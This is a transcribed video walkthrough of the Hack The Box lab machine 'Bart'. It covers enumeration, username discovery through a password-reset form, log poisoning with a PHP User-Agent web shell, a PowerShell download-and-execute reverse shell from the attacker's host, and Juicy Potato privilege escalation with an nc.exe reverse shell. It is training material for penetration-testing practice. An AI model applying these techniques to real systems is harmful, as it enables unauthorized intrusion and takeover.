Hey, what is up everybody? Here's Matsek once again, and in today's video we're gonna be rooting Bart from HTB. This is a medium level machine, and I think it's about interesting topics such as kind of web API. Well, more or less, yeah, you'll see later. Potato like exploits on Windows, log poisoning, subdomain enumeration. It's pretty fun. I really liked it. And as always, I'll just walk you through the whole command I used right here for the network scan. So I use nmap-pn to tell nmap basically that the host is already up and running, preventing it from executing several checks like pings and well several other kind of probes in order to check whether or not the host is up, right? Tag N to disable DNS resolution, that will speed it up in about 1 or 2 minutes. Tag V just to make it verbose. Tag SV to append this version column right here, that is a service version detection scan plus a C appended to it, which will well ran several default scripts the nmap scripting engine has for us for some different ports, such as HTTP server header, HTTP title, methods, favicon, and so on and so forth. Sometimes it'll show you more than that, but in this case we just have these four. Also, we have tag -p- to scan the whole range of ports that are available over the TCP/IP protocol, which is 65,535. And we'll be saving the output to a file called general on a directory named nmap, right? And we see just that we have Microsoft Internet Information Services. I think that is what IIS stands for. HTTPD, yeah, 10.0, and the title, it's trying to redirect us to forum.bart.htb, so we definitely need to save that out in the etc hosts file. You can see the name here. I'm going to be doing that, forum.bart.htb, but in order for it to work, you also need to save the whole bar.htb, right? And indeed, when we visit this page, it will be redirecting us to forum.bar.htb. I think it's kind of slow, and I'm not really sure why. But in the meantime, I like to keep enumerating subdomains, right? Such as FFUF. I'm gonna be using this because FFUF is my preferred tool for fuzzing. So I'm gonna be using it with tag C to use colored output, tag U to specify the URL. In this case, I'm gonna be using here bar.htb. Remember, this is just vhost enumeration or subdomain enumeration. I'm gonna be using checklists, web discovery, no, or is it discovery web? Discovery, DNS, subdomain 20,000, right? I'm gonna be using 200 threads to speed it up. And as a header, I'm gonna be using the host header with fuzz and bart.htb. That way it'll be actually, this is weird. I mean, it's taking a lot of time just to load one page. Bar.htb. Damn it. That's super slow. I don't know why. Let me go ahead. You see here it's loading perfectly fine. I'm gonna be using redirect, and from here I'm gonna be filtering words fw 2090, right? So there you see a monitor vhost. This is super slow. So monitor bar.htb, and then a / at the end, just to we'll have it not taking us to Google. And well, I don't know what's going on. Monitor. Oh, okay. I haven't here. So monitor. Bar.htb. That's fine. So let me go ahead again. And it's loading. Yes, it worked. So that is cool. Let me try again here. Forum.bar.htb. I don't know why it's taking so much. Okay, so we have a server monitor. We have a version here. Now it loaded version, so 3.2.1. You definitely want to check that out in search exploit, which is exploit DB's database, right? And I'm just hovering my mouse over these hyperlinks, and you can see right here the how do you say, left down or down left, I don't know, corner of my screen that it shows the actual link. So when you see a hashtag in front of a route, it means it's just a dynamic content, so it will take us to the same page but to a specific part. So here we see our team. We have Samantha Brown, Daniel Simmons, Robert Hilton, right? And I'm gonna be checking the source code here. You can read a lot of it, but most of it is just Lorem Ipsum. Born from idea of Samantha, degree in business and economy, and Robert, a tech guy with passion for art, business and revolutionary technology. Bart, okay, interesting. Business and revolutionary technology. Bart was born. We're a big team of developers, artists, and business people. We crave for innovations and we put together ideas and technology. Cool. So we, in case we need it, and for example with a brute force attack, we might need to you know, use a CEWL tool in here to gather some credentials, usernames, passwords, possible things. It's gonna be sweeping this source code. Maybe there's some always there's some comments or information in here. Look at this. So I'm seeing we have well, right under the Simmons.bar.htb. Okay, so I have an user here. Probably where was it? Probably from here. Yeah, here. If I click this button, it will be sending a message, as you see in my left down left corner, whatever. Mail to is.brown@bart.local, right? So we have a user, basically. It can still have a lot of other variations. I'm going to be creating a file called users with I'm going to be HTB dot Bart that local in this. Okay, I saw a local and a bar.htb. So the Simmons, first of all, the Simmons or Hilton, H Potter, and info, that would be it, right? The Simmons or Hilton and Samantha Brown, obviously. But I, just in case I need to know the names of these guys, so sorry, Daniel Simmons, Robert Hilton, Harvey Potter, and here Samantha Brown. Now with this cat users, I'm gonna be changing the spaces with new lines. Right, I'm gonna be using sponge just to save the contents into users, right? And well, we can move on. So in here I can sign in, sorry. So admin, I don't know, we can try several basic combinations, and it says the information is incorrect. So here we don't have a way of enumerate users. So I don't know, let me check the source code in here, and I don't see anything of interest. Container. So I'm just gonna be doing forgot password, and we'll see. This is usually a good mechanism to enumerate users. Basically, a good mechanism would tell you if the user exists, you will be receiving a email on your inbox or whatever. If it's not, if it's not well configured, it will give you either, well, it will give you a hint of whether the user exists or not. So admin the provided username cannot be found. So that's right? So we could try to enumerate some users here, either with the newly created list we just had, or with a sex list of several millions of users, right? So I'm gonna be using this, send it over to my burp suite proxy, and I'm gonna be hitting Control R to repeater and Control I to intruder. So I'm here. I want to instead of, well, I'm gonna be clearing all the variables, and I'm gonna be highlighting ASD so I can add a variable in here, and in payloads I'm gonna be loading a thing, but let me cp users downloads. I have already a file there, or users 2, right? So refresh users 2, there you go. So they are the list is loaded, and I want to disable this payload encoding just because there are dots and I don't want them to be encoded. So I'm going to be starting the attack. Okay, here we're just waiting. We see 3663 response, but I also see a 3984. So I'm gonna be filtering by this lens, and the attack is over, I think. Yep. And I apparently have 2 requests with different responses. It's going to be the response on render, and it says an email has been sent to you with information how to reset your password. So we know that Daniel and Harvey works, right? So let me go back, and we should conduct a brute force attack in here now. I'm just gonna go straight with the intended way to move forward, but you must know that you may need to create a Python script in order to brute force this, since I think there is a CSRF token going on every request, maybe. So, well, let me check the repeater. Yep, so CSRF, and there's a token. So you basically need to grab a token every now and then, or every request. That depends on the way the web server or the web page is programmed to, right? So we cannot do it with a tool like Hydra. I'm gonna be going straight, and you need to remember, you need to try everything, right? So I'm gonna be going Harvey, and why don't we try the Potter last name? You'll see it'll work. It'll give us access. That's a bad thing for them, like using super weak and guessable passwords. But anyway, we have server monitoring here, and we have internal chat, last online never. Let me click on that. Currently there's some information there or something. I have servers log. Let me try to open it. Yep, servers log, update, help. And help is actually taking us to a third-party page, and I see website HTB internal 01. I cannot highlight it, but I'm gonna be adding that to my etc host files, app file. So I'm gonna be using here internal 01 bar.htb, just like that. Internal 01.bar.htb and /, and server update is not working or not loading. No. And we see here servers. Well, okay, basically the IP here. Monitoring some icons, I cannot see anything. Actions, what is that? Logs, I don't see anything in here. And internal chat, okay, that was where we were. So let me try to open this from here. And it's not loading, or at least it will take fairly a really long time until it loads. So I guess we'll just have to wait. And it says latency 0, so I'm gonna be cutting the video here, and I will be getting back to you guys once this is loaded. I don't know why it's taking so much time, but yeah, I'll see you in a minute. Right, everybody, seems like it was just a matter of hitting enter, because when I did, it just loaded up. So I see here dev internal chat login form. So I don't know, let me admin 8 characters. So even if I try Harvey and Potter, it will not work. Potter is like 6 words long. So I'm gonna be using Control U to see the view source. I mean, to view the source code of the website. And I don't see anything interesting in here. CSS, whatever. Weekend web analyzer, IIS, PHP, jQuery, nothing at all. But I see here in internal, in the URL, I see a simple chat. Now that could be whatever, right? We could try to look it up on Google, like simple chat, GitHub or open source or whatever. So just try, and we see, well, several links. Like this is a topics file, topics, Kalichkin, in here, this one, and let me see if we can find it with this very query, because there is not the one I'm interested in. Obviously I already did the machine, so okay, now let me try to strip open source off. Maybe this one. I don't know if I already opened it. Which one? Yep, this is the one actually. So actually we found it in the last query, so that's cool. Meaning you would eventually find this, right? So PHP, Ajax, thing, and some interesting things. Basically, there's a folder called simple chat, just as in our web app, simple chat, right? And if we go there, simple chat, we're going to be CSS. So if I saw a CSS in here with a file called chat global CSS, I'm going to see if that same file is there. It is chat global.css. So that, it's pretty interesting, and that looks like my the framework they're using, right? So inspecting this, I'm gonna be seeing login and login for. We can check that and login as well. Let's see that. I want to see register and register for what that is. And in login form, which is where we are, CSS code, you have no registry successful, so you can, okay, so it's including several other functions. Let me see the login.php, uname, and passID. That looks like the I mean, this is actually the .php file that will do the job, right? So we can send a passID and uname variable over post. What else? Register.php. Maybe I can register if I don't have credentials, right? So let me go there. Like, let me open this up here and login. No, register.php. Damn it. Register.php. I don't know what happened there. Man, I don't know. Let me open up register form as well. So register form. PHP. Damn it! The hell? No, why is that going? Why is that happening? So register form. God. I don't know. It looks like it's not loading anymore. Whatever. In the register.php, we see that uname over post and password over post is cool, and we can register with it. Apparently, it needs a reCAPTCHA. We'll see about that. What is in the register form? Nothing. I mean, the register form is just tells what the layout of the form will be. So we'll be working with the register.php, and we'll see. We could try, for example, with curl, right? So curl s, not s, HTTP. Let me just copy that IP. Nah, it's not loading. I don't know what the hell is going on. So I'm gonna be using, instead of this, register.php. And what about if we try the uname tester and add value d tester 123, right? And it doesn't show anything, so I don't know, maybe it worked, maybe it didn't. Tester and tester 123. And well, it worked. So that's fantastic. And I mean, it looks like even though the register endpoint is not visible, we could have tried to brute force. I mean, directory and files brute forcing, resource brute forcing, so to find registered PHP, and from there it would be kind of intuitive to find the right parameters to register a user. I don't think it would be so hard or that hard for an actual attacker. So if these guys didn't want to have that register functionality available, they should definitely remove that out of the whole system or infrastructure, right? So I see several things in here, and I'm going to be inspecting the network because I want to see how the application sends requests. And I see post again. It's like sending post requests to to like get messages in real time, basically. This is not an optimal way. I mean, you never see Facebook like sending a bunch of post requests. Never. So I'm gonna be hitting refresh, and that's basically an F5 functionality. Nothing so important. And I'm gonna be testing here several things such as a script, XXS injection, XSS, alert one script like this, and we'll see. Well, this is not expected to bypass any security measure in place if there is any, but just to check, for example, if it sanitizes the output, if we, instead of seeing greater than or lower than symbols, will come across as encoded, but this doesn't, I mean, it doesn't exploit anything either, right? I don't know what's going on with my mouse today. Sorry. So let me see. Script. Okay, well, that's not what I was going to see, but let me read that. Yeah, nah, but it's fine. Okay, so save chat, create a serialized object and send to log chat.php. XHR request, alert done, and it says done when it's actually done. And here's an IP, so I mean it must be refreshing to the log. So it says done, and I want to see that request. Right, here. We have a request, a GET request actually, for log.php on a folder called log with file name log.txt. Interesting. So let us start inspecting that. Like this. So I'm gonna be curling in this. Damn. Like that. And one. It says one. So first interesting thing is that it says file name log, sorry. And that means it must exist, right? So instead of this, I mean, in the same folder, log.txt should work. And this is interesting because we have a log here, and we have a user agent header in here, right? So we should be able to do something like this: user agent PHP system, right? And inside of this, get, inside of it, cmd. Let me try to use single quotation mark here and double inside and one. But if we do this, well, we indeed see the injected code, right? However, this is a .txt file. I don't know. I mean, we could try something like, I don't know. For example, what happens when I try to specify a text file that might not exist, like this, and it says one again. So we could try to query this, right? I mean, did it create anything new? Well, it does. I mean, that's bad. So we can create files apparently as we want, and obviously txt won't interpret PHP code, but PHP files will, right? So what about we creating a shell.php file, maybe with that very username, user agent, sorry. So if we query shell.php, should we be getting ID? I mean, remote command execution? Not really. I don't know. Who am I? And look at that. I mean, right. I completely forgot that we are using actually a Windows server, not a Linux, right? So if we try ID, well, that won't work in Linux and on Windows. So let us get our shell right off the bat by starting it here and CAR and CMVLP 4444. So basically I'm creating here a listener over port 4444 and using RL grab CAR, which is basically a command and in such combination that will like enhance the performance of a Windows based reverse shell. We don't need this on Linux because there's a native way to stabilize our shell and preventing it from quitting with Control-C or whatever. But in this case, even though RL grab will not prevent the reverse shell from quitting by hitting Control-C, it will give us like a better environment, right? So I'm gonna be using Nishang. So OPT tools, Nishang, and shells, invoke PowerShell TCP. This one. So go ahead and on Google and on GitHub, invoke PowerShell TCP.ps1 on GitHub and download it. Right. So bring it up in here, and I'm gonna be moving it to exploits actually, and shell.ps1 just to have it easier. So in here I'm going to be editing, and at the very end you will not see this, but you can actually write this, which is a function that this has, but we should be executing it manually inside a shell, but we don't have a shell right now and we need to download it to memory. So we need to, and I'll show you how in the web shell. So we need to invoke this, invoke PowerShell TCP, reverse IP address 10.10.14.12 in my case, import 444, so that when we load it into memory, it loads the function itself and call the reverse shell for us. I'm going to be using a HTTP server in here for Python. Cool. And how do you do that? So I'm gonna be using PowerShell C to command line, and here I'm gonna be using invoke expression new object net.web client download string. This is not case insensitive, so you can actually write it all in lowercase, and there will be no trouble. So HTTP 10.10.14.12 shell at ps1 ps1, damn it. So like that, I'm gonna be copying it all just in case I lose it or something, and we should be getting the request in any minute. And there you go. So we have our request. It requested the payload. It downloaded into memory and downloaded from our server and loaded into memory and ran the command. So now we're here. So who am I? And the authority IUSR. This is not authority system. We are in root. We can see that if we go to users, for example, and we try to their administrator, well, we see that the access is denied, so we can't really do that for now. So who am I all? First of all, just in order to see everything, groups, information, privileges, all the stuff. And I see something interesting here, which is SE impersonate privilege, and as you know, you might know or you might not, we have actually a way to escalate our privileges by exploiting that privilege. It's kind of critical. We'll see that Microsoft 10 Win 10 Pro. Okay, let me go ahead and look for Juicy Potato on GitHub, and I'm going to be downloading it from the official, from releases. Fresh potatoes in here. I'm gonna be Python again. With this, I'm gonna be you can go to C, Windows, temp, and create a folder like attacker folder. CD there. And here I can insert util f URL cache split HTTP 10.10.14.12, and that will be juicy potato.exe. 200 requests there too because it's split it. So there, and I can juicy potato.exe. And well, it shows us the syntax of the command. So tag T to create process. I'm gonna be using try both, right? Program to launch. I'm gonna be launching Windows System32 cmd.exe. I'm gonna be using a port like whatever 9292. It can be literally whatever port you want. And as an argument, I'm gonna be specifying, hey, I want you to call, and I'm gonna be, let me see if this works. So I'm gonna be creating a in packet SMB server. I'm gonna be calling it folder. I'm gonna be starting it right here, and I'm gonna be giving it SMB2 support. Okay, but before that, let me locate nc.exe. I'm gonna copy this here. Copy this here. I have now nc.exe. I have a SMB share open, and from here I will grab CARNCMVLP 5555. It's already in use, I don't know why. So 5556. So I'm gonna be calling 10, 10, 14, 12 folder nc.exe e cmd.exe to 10, 10, 14, 12 over 5556. And that should do the work. And it says testing, this is as CLS ID, something like that. I saw it before in here. And CLS ID, yeah. So here we need to specify another different. I think this is Windows 10 Pro. So we can use literally this one or whatever. Right? And so with taxi, we can specify it. Taxi. What's going on? Maybe like that. Charlie, yes. I don't really know if it actually did it, but I'm gonna be using copy 10, 14, 10, 14, 12 folder nc.exe here, copy it here. There you go. Because instead of that, I'm gonna be using then with cmdx, hey, use C Windows temp attacker folder netcat.exe to send me a command.exe to my IP, right? Let's see if that works. I mean, it looks like it is working. Let me try maybe another one. Random. Maybe I need to use system.32 with capital. Nope. Windows 10 Pro. So okay, so I'm gonna be pausing the video to troubleshoot what's going on. I'm not really sure at this point, but I'll give you an answer right away. Wait a minute. Alright guys, I'm back with you, and I did it. So I noticed that it was lacking this /c in order to, well, run commands after cmd.exe. That's basically the very same thing I did when I did something like this in order to locate cmd.exe, right? Otherwise you would be executing it from PowerShell. So that was the reason it wasn't working the first time. The CLS ID was all good, and here again with mine you will see system as opposed to IUSR. I'm gonna be going to user, and from here I'm gonna be researching every file recursively like this. So dir sba colon -d -h. From here you find string /i to insensitive case mode, and tag v2 filter out. So I'm gonna be filtering out app data, local, Microsoft cache, what else, VMware, and all. The word all as in all users. It's not interesting. So let me run that, and well, a lot of information. So WordPress, there's indeed a WordPress. You could enumerate that if we have a config, a wp config.php, for example. Let me see, nothing includes wp content. Where was it? wp admin. Oh well, you look it up, like look for it. In this case I'm gonna be removing it as well because I just want to show you guys the flags. So again, and I have root flaggy here. So type, and where's users? Here. So users flags in here, users, and that would be it. That would be it for today. And yeah, I hope you guys like the box as I did. Hope you guys learned something new. This is as well, I think, in the DigiNulls list, so pretty good preparation for the OSCP. And that would be it, guys. So thank you very much for joining, and I'll see you later in another video.